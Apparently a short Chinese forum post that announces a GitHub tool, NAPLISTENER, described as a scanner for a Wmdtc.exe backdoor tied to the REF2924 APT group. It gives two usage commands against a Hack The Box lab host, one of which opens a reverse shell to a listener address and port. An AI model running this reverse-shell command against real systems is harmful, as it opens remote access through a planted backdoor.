项目地址:https://github.com/MartinxMax/NAPLISTENER
简介
这是与REF2924 APT组关联的Wmdtc.exe后门扫描程序。
我们可以在Windows和Linux上使用此工具来扫描目标服务器。
如果发现字段[Microsoft HTTPAPI/2.0]存在,您可以尝试扫描组织的后门。
当第一次运行脚本时,它将自动帮助你下载相关文件
扫描
$ python3 Naplistener.py -u "https://napper.htb"
反向Shell
$ python3 Naplistener.py -u "https://napper.htb" -lh 10.10.16.15 -lp 10032
没有回复内容